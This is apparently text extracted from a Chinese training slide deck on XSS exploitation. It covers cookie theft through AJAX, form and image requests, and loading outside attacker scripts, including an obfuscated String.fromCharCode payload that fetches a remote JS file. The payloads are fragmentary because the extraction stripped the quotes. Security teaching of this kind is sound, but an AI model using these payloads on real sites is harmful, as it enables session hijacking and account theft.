《XSS利用与挖掘-更新版》课件.pptVIP

PKAV-EDU 《XSS漏洞利用》 第3讲 BY GAINOVER XSS利用流程 用户种类 – 普通用户 含有XSS攻击代码的页面 Cookies数据 使用cookies数据登录 Hello xss! alert(1) alert(document.cookie) Xsser.me Python Perl Php Any other scripts!! 如何发送cookies数据 33/xssexploit/1.request.htm 方式一 AJAX XMLHttpRequest IE Chrome 同域请求 ActiveXObject(Microsoft.XMLHTTP) ActiveXObject(MSXML2.XMLHTTP) XMLHttpRequest 跨域请求 XDomainRequest XMLHttpRequest AJAX数据发送流程 var a = window.XMLHttpRequest(); a.open(GET,URL?数据,true); a.send(null); open(POST,URL,true); send(数据); r.php 跨域 Access-Control-Allow-Origin Access-Control-Allow-Methods Access-Control-Allow-Headers 跨域请求可以发送数据 但不能接受数据 数据库 邮箱 如何发送cookies数据 方式二 /xssexploit/2.formpost.htm form id=x action=POST地址 input type=hidden value=数据 name=c / /form script //提交表单 document.getElementById(x).submit(); /script 如何发送cookies数据 方式三 33/xssexploit/3.image.htm var x = new Image(); x.src=URL?数据; 如何调用外部JS文件 除了获取cookies，我们通常还需要做其它邪恶的事情～～ 获取用户资料 获取当前页面内容 传播消息 – 导致蠕虫 JS 小段 代码 调用 XSS 插入 我们需要执行的一系列操作 调用外部JS文件的方法 script src=JS地址/script 静态创建 动态创建 script var s=document.createElement(script); s.src=JS地址; (document.body||document.documentElement).appendChild(s); /script js Body 调用外部JS文件的方法变形 图片方式调用外部JS img style=display:none src=1 onerror=var s=document.createElement(script);s.src=/m.js;(document.body||document.documentElement).appendChild(s); / alert(1)  调用外部JS eval(String.fromCharCode(118,97,114,32,115,61,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,34,115,99,114,105,112,116,34,41,59,115,46,115,114,99,61,34,104,116,116,112,58,47,47,120,115,115,116,46,115,105,110,97,97,112,112,46,99,111,109,47,109,46,106,115,34,59,40,100,111,99,117,109,101,110,116,46,98,111,100,121,124,124,100,111,99,117,109,101,110,116,46,100,111,99,117,109,101,110,116,69,108,101,109,101,110,116,41,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59)); Flash 方式调用外部JS embed src=/swfplayer.swf allowscriptaccess=always 调用外部JS文件 – 借刀杀人 $.getScript 主公救我！ jQuery君 企鹅君 如何查找网页中可以用于调用外部JS的函数 new